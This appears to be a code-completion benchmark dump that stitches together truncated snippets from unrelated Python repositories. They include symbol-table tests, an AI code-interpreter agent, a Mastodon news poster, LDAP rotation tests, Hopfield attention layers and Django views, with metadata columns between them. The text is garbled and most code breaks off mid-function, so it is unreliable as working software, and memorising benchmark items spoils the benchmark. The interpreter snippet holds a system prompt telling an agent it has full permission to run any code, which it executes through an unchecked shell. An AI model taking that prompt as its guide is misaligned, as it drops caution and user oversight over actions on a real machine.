has the 'main' symbol table as an enclosing scope and is initialised with
init_cal set to True
Args:
main_table (sst.ScopedSymbolTable): used as enclosing scope for this table
Returns:
sst.CalScopedSymbolTable: main calibration symbol table
"""
return sst.CalScopedSymbolTable("cal", enclosing_scope=main_table, init_cal=True)
@pytest.fixture(name="defcal_table")
def fixture_defcal_table(
cal_table: sst.CalScopedSymbolTable,
) -> sst.CalScopedSymbolTable:
"""
Fixture for creating a nested ScopedSymbolTable for openPulse code,
has the 'main calibration' (cal_table) as an enclosing scope
Args:
cal_table (sst.CalScopedSymbolTable): used as enclosing scope for this table
Returns:
sst.CalScopedSymbolTable: nested calibration symbol table
"""
return sst.CalScopedSymbolTable("defcal", enclosing_scope=cal_table)
def test_scoped_symbol_table_basic(main_table: sst.ScopedSymbolTable):
"""Test basic insertion and lookup in table without enclosing scope"""
# test that built in symbols have been inserted
for symbol_list in SYMBOL_LISTS:
symbol_names = []
for symbol in symbol_list:
assert main_table.lookup(symbol.name) is symbol
symbol_names.append(symbol.name)
# test that names of builtin symbols are returned by the keys method
for name in symbol_names:
assert name in main_table.keys()
assert name in main_table.keys(current_scope_only=True)
# test inserting a symbol and lookin it up and name being returned by keys()
| """
The scoped symbol table is intended to be used by the Semantic Analyser module.
An 'end-to-end' use case example will be included in the tests for the Semantic Analyser
ToDo update working when adding semantic analyser tests
"""
SYMBOL_LISTS = [sst.BUILTIN_TYPES, sst.BUILTIN_ZI_EXP]
CAL_SYMBOL_LISTS = [sst.BUILTIN_CAL_TYPES, sst.BUILTIN_OPENPULSE, sst.BUILTIN_ZI_WFM]
@pytest.fixture(name="main_table")
def fixture_main_table() -> sst.ScopedSymbolTable:
"""Fixture for creating the 'main' ScopedSymbolTable
this table has no enclosing scope
Returns:
sst.ScopedSymbolTable: symbol table with no enclosing scope
"""
return sst.ScopedSymbolTable("main")
@pytest.fixture(name="nested_table")
def fixture_nested_table(main_table: sst.ScopedSymbolTable) -> sst.ScopedSymbolTable:
"""Fixture for creating a nested ScopedSymbolTable
the 'main' symbol table encloses this table
Args:
main_table (sst.ScopedSymbolTable): used as enclosing scope for this table
Returns:
sst.ScopedSymbolTable: symbol table with enclosing scope
"""
return sst.ScopedSymbolTable("nested", enclosing_scope=main_table)
@pytest.fixture(name="cal_table")
def fixture_cal_table(main_table: sst.ScopedSymbolTable) -> sst.CalScopedSymbolTable:
"""
Fixture for creating 'main' a ScopedSymbolTable for openPulse code,
has the 'main' symbol table as an enclosing scope and is initialised with
init_cal set to True
Args:
main_table (sst.ScopedSymbolTable): used as enclosing scope for this table
Returns:
sst.CalScopedSymbolTable: main calibration symbol table
"""
return sst.CalScopedSymbolTable("cal", enclosing_scope=main_table, init_cal=True)
@pytest.fixture(name="defcal_table")
def fixture_defcal_table(
cal_table: sst.CalScopedSymbolTable,
) -> sst.CalScopedSymbolTable:
"""
Fixture for creating a nested ScopedSymbolTable for openPulse code,
has the 'main calibration' (cal_table) as an enclosing scope
Args:
cal_table (sst.CalScopedSymbolTable): used as enclosing scope for this table
Returns:
sst.CalScopedSymbolTable: nested calibration symbol table
"""
return sst.CalScopedSymbolTable("defcal", enclosing_scope=cal_table)
def test_scoped_symbol_table_basic(main_table: sst.ScopedSymbolTable):
"""Test basic insertion and lookup in table without enclosing scope"""
# test that built in symbols have been inserted
for symbol_list in SYMBOL_LISTS:
symbol_names = []
for symbol in symbol_list:
assert main_table.lookup(symbol.name) is symbol
symbol_names.append(symbol.name)
# test that names of builtin symbols are returned by the keys method
for name in symbol_names:
assert name in main_table.keys()
assert name in main_table.keys(current_scope_only=True)
# test inserting a symbol and lookin it up and name being returned by keys() | c_symbol = symbols.ClassicalSymbol(name="test", kind=symbols.angle_type.name) | 1 | 2023-11-16 17:37:29+00:00 | 2k |
PrAsAnNaRePo/LocalAgent | localagent/interpreter.py | [
{
"identifier": "get_prompt_from_template",
"path": "localagent/utils.py",
"snippet": "def get_prompt_from_template(system, history, human_, assistant_, eos_token):\n for i in history:\n if i['role'] == 'user':\n system += f'{human_}{i[\"content\"]}{eos_token}'\n ... | import subprocess
import sys
from localagent.utils import get_prompt_from_template, internal_monologue
from localagent.gen import run, stream_run, ollama_generate
from rich.console import Console | 1,594 |
console = Console()
CODE_INTERPRETER = """You are Open Interpreter, a world-class programmer that can complete any goal by executing code.
First, write a plan. **Always recap the plan between each code block**.
When you execute code, it will be executed **on the user's machine**. The user has given you **full and complete permission** to execute any code necessary to complete the task.
If you want to send data between programming languages, save the data to a txt or json.
You can access the internet. Run **any code** to achieve the goal, and if at first you don't succeed, try again and again.
You can install new packages.
When a user refers to a filename, they're likely referring to an existing file in the directory you're currently executing code in.
Write messages to the user in Markdown.
In general, try to **make plans** with as few steps as possible. Remember that one code block is considered as a single file and you can't able to access the variable from first code blocks in the second one.
You are capable of **any** task. Don't install libraries using '!' in the python code block instead use seperate bash code block.
As a open interpreter you should mostly respond with codes more than a text. Always tries to print the things up so you can know them via output.
"""
def extract_code(string):
code_blocks = []
parts = string.split("```")
for i in range(1, len(parts), 2):
lines = parts[i].split("\n")
lang = lines[0]
code = "\n".join(lines[1:])
code_blocks.append((lang, code))
return code_blocks
class Interpreter:
def __init__(self, exec, max_try, human_, assistant_, eos_token, stream=False) -> None:
self.history = []
self.exec = exec
self.max_try = max_try
self.human_ = human_
self.assistant_ = assistant_
self.eos_token = eos_token
self.stream = stream
def execute_code(self, lang, code, timeout=10):
if lang.lower() == 'python':
try:
output = subprocess.run([sys.executable, "-c", code], capture_output=True, text=True, timeout=timeout)
except subprocess.TimeoutExpired:
print(f"Execution of Python code timed out after {timeout} seconds.")
return None
elif lang.lower() == 'bash':
try:
output = subprocess.run(code, shell=True, capture_output=True, text=True, timeout=timeout)
except subprocess.TimeoutExpired:
print(f"Execution of Bash code timed out after {timeout} seconds.")
return None
else:
print('Only supported python and ')
return None
return output
def __call__(self, task):
print('\n')
|
console = Console()
CODE_INTERPRETER = """You are Open Interpreter, a world-class programmer that can complete any goal by executing code.
First, write a plan. **Always recap the plan between each code block**.
When you execute code, it will be executed **on the user's machine**. The user has given you **full and complete permission** to execute any code necessary to complete the task.
If you want to send data between programming languages, save the data to a txt or json.
You can access the internet. Run **any code** to achieve the goal, and if at first you don't succeed, try again and again.
You can install new packages.
When a user refers to a filename, they're likely referring to an existing file in the directory you're currently executing code in.
Write messages to the user in Markdown.
In general, try to **make plans** with as few steps as possible. Remember that one code block is considered as a single file and you can't able to access the variable from first code blocks in the second one.
You are capable of **any** task. Don't install libraries using '!' in the python code block instead use seperate bash code block.
As a open interpreter you should mostly respond with codes more than a text. Always tries to print the things up so you can know them via output.
"""
def extract_code(string):
code_blocks = []
parts = string.split("```")
for i in range(1, len(parts), 2):
lines = parts[i].split("\n")
lang = lines[0]
code = "\n".join(lines[1:])
code_blocks.append((lang, code))
return code_blocks
class Interpreter:
def __init__(self, exec, max_try, human_, assistant_, eos_token, stream=False) -> None:
self.history = []
self.exec = exec
self.max_try = max_try
self.human_ = human_
self.assistant_ = assistant_
self.eos_token = eos_token
self.stream = stream
def execute_code(self, lang, code, timeout=10):
if lang.lower() == 'python':
try:
output = subprocess.run([sys.executable, "-c", code], capture_output=True, text=True, timeout=timeout)
except subprocess.TimeoutExpired:
print(f"Execution of Python code timed out after {timeout} seconds.")
return None
elif lang.lower() == 'bash':
try:
output = subprocess.run(code, shell=True, capture_output=True, text=True, timeout=timeout)
except subprocess.TimeoutExpired:
print(f"Execution of Bash code timed out after {timeout} seconds.")
return None
else:
print('Only supported python and ')
return None
return output
def __call__(self, task):
print('\n') | internal_monologue("Interpreter is executing the code...\n") | 1 | 2023-11-10 07:47:41+00:00 | 2k |
Cymaphore/orfodon-service | orfodon_service.py | [
{
"identifier": "config",
"path": "config.py",
"snippet": ""
},
{
"identifier": "feeds",
"path": "feeds.py",
"snippet": ""
},
{
"identifier": "hashtag_replace",
"path": "hashtag_modification.py",
"snippet": ""
},
{
"identifier": "hashtag_blacklist",
"path": "h... | import re
import yaml
import copy
import feedparser
import time
import requests
import hashlib
from datetime import datetime
from bs4 import BeautifulSoup
from mastodon import Mastodon
from pprint import pprint
from config import config
from credentials import credentials
from feeds import feeds
from hashtag_modification import hashtag_replace
from hashtag_modification import hashtag_blacklist
from hashtag_modification import category_aliases
from hashtag_modification import oewa_sport_aliases
from hashtag_modification import oewa_bypass | 1,155 | hashtag_wordlist = []
#############################################################################
##
# Main function
# Call all the stages in correct order
def main():
# Load hashtag wordlists
load_hashtags()
# Load previous state, initialize new state
load_state()
# Load the configured feeds and preprocess text
load_feeds()
# Grab post references from other channels for boosting, keep id from oldState
grab_posts()
# Post newly generated articles to the channels
post_feeds()
# Save state for next cycle
save_state()
#############################################################################
##
# Load hashtag wordlists
def load_hashtags():
hashtags_filename = config["files"]["global_hashtags"]
if True:
hashtags_file = open(hashtags_filename, "r")
global hashtag_wordlist
hashtag_wordlist = hashtags_file.read().splitlines()
#############################################################################
##
# Load the configured feeds and preprocess text
def load_state():
global state
global oldState
global hashtag_wordlist
try:
with open(config["files"]["state"]) as fh:
oldState = yaml.load(fh, yaml.SafeLoader)
except:
oldState = {}
for feed in feeds:
if not feed["id"] in state:
state[feed["id"]] = {}
if not feed["id"] in oldState:
oldState[feed["id"]] = {}
#############################################################################
##
# Save state for next cycle
def save_state():
with open(config["files"]["state"], 'w') as fh:
fh.write(yaml.dump(state, default_flow_style=False))
#############################################################################
##
# Load the configured feeds and preprocess text
def load_feeds():
global state
global oldState
for feed in feeds:
feedStateOld = oldState[feed["id"]]
feedState = state[feed["id"]]
if "url" in feed:
entries = feedparser.parse(feed["url"]).entries
if len(entries) < 1:
raise RuntimeError("No elements in feed " + feed["url"])
for entry in entries:
title = entry.get('title')
text = entry.get('summary')
url = entry.get('link')
category = entry.get('category')
raw_posting = ""
post_type_text = False
hashtags = []
updated = entry.get('updated')
boost_target = ""
edited = False
exists = False
oldPosting = {}
status_id = 0
posted = False
post_text = ""
boosted = False
ref = ""
if url in feedStateOld:
exists = True
oldPosting = feedStateOld[url]
if "status_id" in oldPosting:
status_id = oldPosting["status_id"]
if "posted" in oldPosting:
posted = oldPosting["posted"]
if "boosted" in oldPosting:
boosted = oldPosting["boosted"]
first_oewa = False
if "enable_oewa_sport" in feed and feed["enable_oewa_sport"]:
first_oewa = True
| ##
# @mainpage ORFodon service script
#
# Quick and dirty solution to turn ORF.at into a Mastodon-site
#
# @Warning this is tailormade for ORF.at and will not work without modification
# with other RSS based news sites!
#
# Inspired by feediverse from Ed Summers
#
# Process configuration, fetch news entries and post them to different accounts
#
# Dependencies:
# - bs4
# - feedparser
# - yaml
# - mastodon
#
# License: The MIT License (MIT)
# Copyright: Martin Eitzenberger <x@cymaphore.net>
# @cymaphore@i.cymaphore.net
# https://cymaphore.net
#
# @todo Secondary urls like https://vorarlberg.orf.at/radio/stories/3231551/ https://steiermark.orf.at/magazin/stories/3232156/
# @todo Sort news in descending order by date when bulk processing <-- low prio, usually not an issue
# @todo Account mentioner ("der Standard" --> @derStandard)?
# @todo extract top hashtags from current posts and add them to profile
# @todo ORF_Topos as channel
#
#############################################################################
# External components
#############################################################################
# Configuration
#############################################################################
# Current fetched articles / state
global state
# State from previous run cycle
global oldState
# Global hashtag wordlist
global hashtag_wordlist
state = {}
oldState = {}
hashtag_wordlist = []
#############################################################################
##
# Main function
# Call all the stages in correct order
def main():
# Load hashtag wordlists
load_hashtags()
# Load previous state, initialize new state
load_state()
# Load the configured feeds and preprocess text
load_feeds()
# Grab post references from other channels for boosting, keep id from oldState
grab_posts()
# Post newly generated articles to the channels
post_feeds()
# Save state for next cycle
save_state()
#############################################################################
##
# Load hashtag wordlists
def load_hashtags():
hashtags_filename = config["files"]["global_hashtags"]
if True:
hashtags_file = open(hashtags_filename, "r")
global hashtag_wordlist
hashtag_wordlist = hashtags_file.read().splitlines()
#############################################################################
##
# Load the configured feeds and preprocess text
def load_state():
global state
global oldState
global hashtag_wordlist
try:
with open(config["files"]["state"]) as fh:
oldState = yaml.load(fh, yaml.SafeLoader)
except:
oldState = {}
for feed in feeds:
if not feed["id"] in state:
state[feed["id"]] = {}
if not feed["id"] in oldState:
oldState[feed["id"]] = {}
#############################################################################
##
# Save state for next cycle
def save_state():
with open(config["files"]["state"], 'w') as fh:
fh.write(yaml.dump(state, default_flow_style=False))
#############################################################################
##
# Load the configured feeds and preprocess text
def load_feeds():
global state
global oldState
for feed in feeds:
feedStateOld = oldState[feed["id"]]
feedState = state[feed["id"]]
if "url" in feed:
entries = feedparser.parse(feed["url"]).entries
if len(entries) < 1:
raise RuntimeError("No elements in feed " + feed["url"])
for entry in entries:
title = entry.get('title')
text = entry.get('summary')
url = entry.get('link')
category = entry.get('category')
raw_posting = ""
post_type_text = False
hashtags = []
updated = entry.get('updated')
boost_target = ""
edited = False
exists = False
oldPosting = {}
status_id = 0
posted = False
post_text = ""
boosted = False
ref = ""
if url in feedStateOld:
exists = True
oldPosting = feedStateOld[url]
if "status_id" in oldPosting:
status_id = oldPosting["status_id"]
if "posted" in oldPosting:
posted = oldPosting["posted"]
if "boosted" in oldPosting:
boosted = oldPosting["boosted"]
first_oewa = False
if "enable_oewa_sport" in feed and feed["enable_oewa_sport"]:
first_oewa = True | if not category in oewa_bypass: | 6 | 2023-11-10 10:25:43+00:00 | 2k |
Vitesco-Technologies/ldap-password-rotation | tests/test_lambda.py | [
{
"identifier": "lambda_function",
"path": "src/lambda_function.py",
"snippet": "SECRETS_MANAGER_KEY_USERNAME = (\n os.environ.get(\"SECRETS_MANAGER_KEY_USERNAME\") or \"username\"\n)\nSECRETS_MANAGER_KEY_PASSWORD = (\n os.environ.get(\"SECRETS_MANAGER_KEY_PASSWORD\") or \"password\"\n)\nSECRETS_M... | import json
import logging
import os
import boto3
import ldap3
import mock
import pytest
from uuid import uuid4
from moto import mock_lambda, mock_secretsmanager
from src import lambda_function
from .utilities import lambda_util
from .utilities.ldap_test import LdapServer | 1,047 | # Copyright 2023 Daniel Dias, Vitesco Technologies
#
# SPDX-License-Identifier: Apache-2.0
_region = "eu-central-1"
# server is defined as global to allow us to update it when we mock
# ldap3.extend.microsoft.modifyPassword.ad_modify_password with mock_ad_modify_password
_server = LdapServer()
logger = logging.getLogger()
logger.setLevel(logging.INFO)
############
# fixtures #
############
@pytest.fixture(scope="function", autouse=True)
def aws_credentials():
"""Mocked AWS Credentials for moto."""
os.environ["AWS_ACCESS_KEY_ID"] = "testing"
os.environ["AWS_SECRET_ACCESS_KEY"] = "testing"
os.environ["AWS_SECURITY_TOKEN"] = "testing"
os.environ["AWS_SESSION_TOKEN"] = "testing"
os.environ["AWS_DEFAULT_REGION"] = _region
@pytest.fixture(scope="function", autouse=True)
def lambda_env():
| # Copyright 2023 Daniel Dias, Vitesco Technologies
#
# SPDX-License-Identifier: Apache-2.0
_region = "eu-central-1"
# server is defined as global to allow us to update it when we mock
# ldap3.extend.microsoft.modifyPassword.ad_modify_password with mock_ad_modify_password
_server = LdapServer()
logger = logging.getLogger()
logger.setLevel(logging.INFO)
############
# fixtures #
############
@pytest.fixture(scope="function", autouse=True)
def aws_credentials():
"""Mocked AWS Credentials for moto."""
os.environ["AWS_ACCESS_KEY_ID"] = "testing"
os.environ["AWS_SECRET_ACCESS_KEY"] = "testing"
os.environ["AWS_SECURITY_TOKEN"] = "testing"
os.environ["AWS_SESSION_TOKEN"] = "testing"
os.environ["AWS_DEFAULT_REGION"] = _region
@pytest.fixture(scope="function", autouse=True)
def lambda_env(): | lambda_function.SECRETS_MANAGER_KEY_USERNAME = "bind_dn" | 0 | 2023-11-17 15:03:58+00:00 | 2k |
totallynotadi/vibrant-python | vibrant/main.py | [
{
"identifier": "generate",
"path": "vibrant/generator.py",
"snippet": "def generate(swatches: List[Swatch]) -> Palette:\n max_poplation = find_max_population(swatches)\n\n palette: Palette = generate_variation_colors(\n swatches, max_poplation, generator_opts\n )\n generate_empty_swa... | import io
from typing import Union
from PIL.Image import Image as PILImage
from vibrant.generator import generate
from vibrant.image import VibrantImage
from vibrant.models import Palette, Props | 1,052 |
class Vibrant:
props: Props
def __init__(self, color_count=64, quality=5) -> None:
self.props = Props(color_count=color_count, quality=quality)
def get_palette(
self,
src: Union[
bytes,
str,
io.BytesIO,
io.BufferedReader,
PILImage,
|
class Vibrant:
props: Props
def __init__(self, color_count=64, quality=5) -> None:
self.props = Props(color_count=color_count, quality=quality)
def get_palette(
self,
src: Union[
bytes,
str,
io.BytesIO,
io.BufferedReader,
PILImage, | VibrantImage, | 1 | 2023-11-13 10:05:11+00:00 | 2k |
MAGICS-LAB/SparseModernHopfield | layers.py | [
{
"identifier": "Sparsemax",
"path": "utils/sparse_max.py",
"snippet": "class Sparsemax(nn.Module):\n __constants__ = [\"dim\"]\n\n def __init__(self, dim=-1):\n \"\"\"\n Sparsemax class as seen in https://arxiv.org/pdf/1602.02068.pdf\n Parameters\n ----------\n ... | import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
import math
from einops import rearrange, repeat
from math import sqrt
from utils.sparse_max import Sparsemax
from utils.entmax import Entmax15
from utils.general_entmax import EntmaxAlpha | 1,511 |
class FullAttention(nn.Module):
'''
The Attention operation
'''
def __init__(self, scale=None, attention_dropout=0.0):
super(FullAttention, self).__init__()
self.scale = scale
self.dropout = nn.Dropout(attention_dropout)
def forward(self, queries, keys, values, mask=None):
B, L, H, E = queries.shape
_, S, _, D = values.shape
scale = self.scale or 1. / sqrt(E)
scores = torch.einsum("blhe,bshe->bhls", queries, keys)
if mask is not None:
mask = mask.unsqueeze(1).unsqueeze(1).repeat(1, H, scores.size(-2), 1)
scores = scores.masked_fill_(mask, float('-inf'))
A = self.dropout(torch.softmax(scale * scores, dim=-1))
V = torch.einsum("bhls,bshd->blhd", A, values)
return V.contiguous()
class AttentionLayer(nn.Module):
'''
The Multi-head Self-Attention (MSA) Layer
'''
def __init__(
self,
d_model,
n_heads,
d_keys=None,
d_values=None,
mix=True,
dropout=0.1,
scale=None):
super(AttentionLayer, self).__init__()
d_keys = d_keys or (d_model // n_heads)
d_values = d_values or (d_model // n_heads)
self.d_model = d_model
self.inner_attention = FullAttention(
scale=scale, attention_dropout=dropout)
self.query_projection = nn.Linear(d_model, d_keys * n_heads)
self.key_projection = nn.Linear(d_model, d_keys * n_heads)
self.value_projection = nn.Linear(d_model, d_values * n_heads)
self.out_projection = nn.Linear(d_values * n_heads, d_model)
self.n_heads = n_heads
self.mix = mix
def forward(self, inputs):
queries = inputs
keys = inputs
values = inputs
B, L, _ = queries.shape
_, S, _ = keys.shape
H = self.n_heads
queries = self.query_projection(queries).view(B, L, H, -1)
keys = self.key_projection(keys).view(B, S, H, -1)
values = self.value_projection(values).view(B, S, H, -1)
out = self.inner_attention(
queries,
keys,
values,
)
out = out.view(B, L, -1)
out = out.mean(1)
return self.out_projection(out)
class HopfieldCore(nn.Module):
'''
The Hopfield operation
'''
def __init__(self, scale=None, attention_dropout=0.0, mode='sparsemax', norm=False):
super(HopfieldCore, self).__init__()
self.scale = scale
self.norm = norm
self.dropout = nn.Dropout(attention_dropout)
if mode == 'sparsemax':
self.softmax = Sparsemax(dim=-1)
elif mode == 'entmax':
|
class FullAttention(nn.Module):
'''
The Attention operation
'''
def __init__(self, scale=None, attention_dropout=0.0):
super(FullAttention, self).__init__()
self.scale = scale
self.dropout = nn.Dropout(attention_dropout)
def forward(self, queries, keys, values, mask=None):
B, L, H, E = queries.shape
_, S, _, D = values.shape
scale = self.scale or 1. / sqrt(E)
scores = torch.einsum("blhe,bshe->bhls", queries, keys)
if mask is not None:
mask = mask.unsqueeze(1).unsqueeze(1).repeat(1, H, scores.size(-2), 1)
scores = scores.masked_fill_(mask, float('-inf'))
A = self.dropout(torch.softmax(scale * scores, dim=-1))
V = torch.einsum("bhls,bshd->blhd", A, values)
return V.contiguous()
class AttentionLayer(nn.Module):
'''
The Multi-head Self-Attention (MSA) Layer
'''
def __init__(
self,
d_model,
n_heads,
d_keys=None,
d_values=None,
mix=True,
dropout=0.1,
scale=None):
super(AttentionLayer, self).__init__()
d_keys = d_keys or (d_model // n_heads)
d_values = d_values or (d_model // n_heads)
self.d_model = d_model
self.inner_attention = FullAttention(
scale=scale, attention_dropout=dropout)
self.query_projection = nn.Linear(d_model, d_keys * n_heads)
self.key_projection = nn.Linear(d_model, d_keys * n_heads)
self.value_projection = nn.Linear(d_model, d_values * n_heads)
self.out_projection = nn.Linear(d_values * n_heads, d_model)
self.n_heads = n_heads
self.mix = mix
def forward(self, inputs):
queries = inputs
keys = inputs
values = inputs
B, L, _ = queries.shape
_, S, _ = keys.shape
H = self.n_heads
queries = self.query_projection(queries).view(B, L, H, -1)
keys = self.key_projection(keys).view(B, S, H, -1)
values = self.value_projection(values).view(B, S, H, -1)
out = self.inner_attention(
queries,
keys,
values,
)
out = out.view(B, L, -1)
out = out.mean(1)
return self.out_projection(out)
class HopfieldCore(nn.Module):
'''
The Hopfield operation
'''
def __init__(self, scale=None, attention_dropout=0.0, mode='sparsemax', norm=False):
super(HopfieldCore, self).__init__()
self.scale = scale
self.norm = norm
self.dropout = nn.Dropout(attention_dropout)
if mode == 'sparsemax':
self.softmax = Sparsemax(dim=-1)
elif mode == 'entmax': | self.softmax = Entmax15(dim=-1) | 1 | 2023-11-12 06:36:52+00:00 | 2k |
Kuba314/arcparse | arcparse/_partial_arguments.py | [
{
"identifier": "InvalidArgument",
"path": "arcparse/errors.py",
"snippet": "class InvalidArgument(InvalidParser):\n pass"
},
{
"identifier": "InvalidTypehint",
"path": "arcparse/errors.py",
"snippet": "class InvalidTypehint(InvalidArgument):\n pass"
},
{
"identifier": "Mis... | from abc import ABC, abstractmethod
from collections.abc import Callable, Collection
from dataclasses import dataclass
from typing import Any, Literal, get_origin
from arcparse.errors import InvalidArgument, InvalidTypehint, MissingConverter
from ._typehints import (
extract_collection_type,
extract_literal_strings,
extract_optional_type,
extract_type_from_typehint,
)
from .arguments import (
BaseValueArgument,
ContainerApplicable,
Flag,
NoFlag,
Option,
Positional,
TriFlag,
Void,
void,
)
from .converters import itemwise
import re | 1,109 |
@dataclass(kw_only=True, eq=False)
class PartialMxGroup:
required: bool = False
@dataclass(kw_only=True)
|
@dataclass(kw_only=True, eq=False)
class PartialMxGroup:
required: bool = False
@dataclass(kw_only=True) | class BasePartialArgument[R: ContainerApplicable](ABC): | 7 | 2023-11-15 08:58:37+00:00 | 2k |
rohitsinghlab/sceodesic | sceodesic/sceo_main/estimate_covariances.py | [
{
"identifier": "fn_timer",
"path": "sceodesic/utils/fn_timer.py",
"snippet": "def fn_timer(func):\n @wraps(func)\n def wrapper(*args, **kwargs):\n\n # run and time function\n start_time = time.time()\n result = func(*args, **kwargs)\n end_time = time.time()\n el... | import scipy
import pickle
import sys
from ..utils import fn_timer
from ..helper import compute_covariance_and_ncomps_pct_variance
from .default_keys import * | 1,070 |
# package-specific modules
@fn_timer
def estimate_covariances(adata, max_condition_number, pvd_pct=0.9,
copy=False, return_results=False,
top_genes=None, cohort_assn=None,
uns_key=None):
if uns_key is None:
uns_key = UNS_KEY
# not able to be passed in
hvg_key = HVG_KEY
# top_genes can either be passed in anew or be precomputed using get_locally_variable_genes
if top_genes is None:
try:
top_genes = adata.uns[uns_key][hvg_key]
except Exception as e:
message = ("Error: must either specify a set of genes to consider or "
"have run sceodesic.get_locally_variable_genes beforehand.")
print(message, file=sys.stderr)
raise e
else:
adata.uns[uns_key][hvg_key] = top_genes
# can either pass in a cell cohort assignment (array cohort_assn with cell[i] having cluster assn cohort_assn[i])
# or the cluster_key
clustering_results = None
if cohort_assn is None:
try:
clustering_results = adata.uns[uns_key]
except:
message = ("Error: must either specify a cell cohort assignment or "
"have run sceodesic.get_cell_cohorts beforehand.")
print(message, file=sys.stderr)
raise e
else:
c2c = {}
for i, c in enumerate(cohort_assn):
c2c[c] = c2c.get(c, []) + [i]
clustering_results = {'cell2cluster': c2c, 'stratify_cols': '***NOT SPECIFIED***'}
adata.uns[uns_key].update(clustering_results)
return _estimate_covariances(adata, max_condition_number, pvd_pct,
copy, return_results,
top_genes=top_genes,
results_clustering=clustering_results,
uns_key=uns_key)
def _estimate_covariances(adata, max_condition_number, pvd_pct=0.9,
copy=False, return_results=False, coexpression_filename=None,
top_genes=None, results_clustering=None,
uns_key=None, cluster_covar_key=None,
cluster_var_ct_key=None):
if uns_key is None:
uns_key = UNS_KEY
if cluster_covar_key is None:
cluster_covar_key = CLUSTER_COVAR_KEY
if cluster_var_ct_key is None:
cluster_var_ct_key = CLUSTER_VAR_CT_KEY
if copy:
adata = adata.copy()
# change later
top_genes = top_genes
results_clustering = results_clustering
cell2cluster = results_clustering["cell2cluster"]
filtered_data = adata[:,top_genes]
# Get the clusters from the reduced data.
clusters = {}
processed_data = None
if scipy.sparse.issparse(filtered_data.X):
processed_data = filtered_data.X.A
else:
processed_data = filtered_data.X
for key in cell2cluster.keys():
cluster_indices = cell2cluster[key]
clusters[key] = processed_data[cluster_indices,:]
cluster_covariances = {}
cluster_var_count = {}
for i,cluster in clusters.items():
|
# package-specific modules
@fn_timer
def estimate_covariances(adata, max_condition_number, pvd_pct=0.9,
copy=False, return_results=False,
top_genes=None, cohort_assn=None,
uns_key=None):
if uns_key is None:
uns_key = UNS_KEY
# not able to be passed in
hvg_key = HVG_KEY
# top_genes can either be passed in anew or be precomputed using get_locally_variable_genes
if top_genes is None:
try:
top_genes = adata.uns[uns_key][hvg_key]
except Exception as e:
message = ("Error: must either specify a set of genes to consider or "
"have run sceodesic.get_locally_variable_genes beforehand.")
print(message, file=sys.stderr)
raise e
else:
adata.uns[uns_key][hvg_key] = top_genes
# can either pass in a cell cohort assignment (array cohort_assn with cell[i] having cluster assn cohort_assn[i])
# or the cluster_key
clustering_results = None
if cohort_assn is None:
try:
clustering_results = adata.uns[uns_key]
except:
message = ("Error: must either specify a cell cohort assignment or "
"have run sceodesic.get_cell_cohorts beforehand.")
print(message, file=sys.stderr)
raise e
else:
c2c = {}
for i, c in enumerate(cohort_assn):
c2c[c] = c2c.get(c, []) + [i]
clustering_results = {'cell2cluster': c2c, 'stratify_cols': '***NOT SPECIFIED***'}
adata.uns[uns_key].update(clustering_results)
return _estimate_covariances(adata, max_condition_number, pvd_pct,
copy, return_results,
top_genes=top_genes,
results_clustering=clustering_results,
uns_key=uns_key)
def _estimate_covariances(adata, max_condition_number, pvd_pct=0.9,
copy=False, return_results=False, coexpression_filename=None,
top_genes=None, results_clustering=None,
uns_key=None, cluster_covar_key=None,
cluster_var_ct_key=None):
if uns_key is None:
uns_key = UNS_KEY
if cluster_covar_key is None:
cluster_covar_key = CLUSTER_COVAR_KEY
if cluster_var_ct_key is None:
cluster_var_ct_key = CLUSTER_VAR_CT_KEY
if copy:
adata = adata.copy()
# change later
top_genes = top_genes
results_clustering = results_clustering
cell2cluster = results_clustering["cell2cluster"]
filtered_data = adata[:,top_genes]
# Get the clusters from the reduced data.
clusters = {}
processed_data = None
if scipy.sparse.issparse(filtered_data.X):
processed_data = filtered_data.X.A
else:
processed_data = filtered_data.X
for key in cell2cluster.keys():
cluster_indices = cell2cluster[key]
clusters[key] = processed_data[cluster_indices,:]
cluster_covariances = {}
cluster_var_count = {}
for i,cluster in clusters.items(): | cluster_covar, var_count = compute_covariance_and_ncomps_pct_variance(cluster, max_condition_number, pvd_pct) | 1 | 2023-11-10 12:28:33+00:00 | 2k |
dacx/fcd-community | fcd_community/users/tests/test_views.py | [
{
"identifier": "UserAdminChangeForm",
"path": "fcd_community/users/forms.py",
"snippet": "class UserAdminChangeForm(admin_forms.UserChangeForm):\n class Meta(admin_forms.UserChangeForm.Meta):\n model = User\n field_classes = {\"email\": EmailField}"
},
{
"identifier": "User",
... | import pytest
from django.conf import settings
from django.contrib import messages
from django.contrib.auth.models import AnonymousUser
from django.contrib.messages.middleware import MessageMiddleware
from django.contrib.sessions.middleware import SessionMiddleware
from django.http import HttpRequest, HttpResponseRedirect
from django.test import RequestFactory
from django.urls import reverse
from django.utils.translation import gettext_lazy as _
from fcd_community.users.forms import UserAdminChangeForm
from fcd_community.users.models import User
from fcd_community.users.tests.factories import UserFactory
from fcd_community.users.views import (
UserRedirectView,
UserUpdateView,
user_detail_view,
) | 863 |
pytestmark = pytest.mark.django_db
class TestUserUpdateView:
"""
TODO:
extracting view initialization code as class-scoped fixture
would be great if only pytest-django supported non-function-scoped
fixture db access -- this is a work-in-progress for now:
https://github.com/pytest-dev/pytest-django/pull/258
"""
def dummy_get_response(self, request: HttpRequest):
return None
def test_get_success_url(self, user: User, rf: RequestFactory):
|
pytestmark = pytest.mark.django_db
class TestUserUpdateView:
"""
TODO:
extracting view initialization code as class-scoped fixture
would be great if only pytest-django supported non-function-scoped
fixture db access -- this is a work-in-progress for now:
https://github.com/pytest-dev/pytest-django/pull/258
"""
def dummy_get_response(self, request: HttpRequest):
return None
def test_get_success_url(self, user: User, rf: RequestFactory): | view = UserUpdateView() | 3 | 2023-11-10 08:23:29+00:00 | 2k |
fepegar/jvol | src/jvol/jvol.py | [
{
"identifier": "open_jvol",
"path": "src/jvol/io.py",
"snippet": "def open_jvol(path: Path) -> Tuple[np.ndarray, np.ndarray]:\n loaded = np.load(path)\n ijk_to_ras = fill_ijk_to_ras(loaded[FormatKeys.IJK_TO_RAS.value])\n quantization_block = loaded[FormatKeys.QUANTIZATION_BLOCK.value]\n arr... | import os
import numpy as np
import numpy.typing as npt
from pathlib import Path
from typing import Any
from typing import TypeAlias
from typing import Union
from .io import open_jvol
from .io import save_jvol | 1,265 | from __future__ import annotations
TypePath: TypeAlias = Union[str, os.PathLike]
class JpegVolume:
"""Base class for saving and loading JPEG-encoded volumes.
Args:
array: 3D NumPy array.
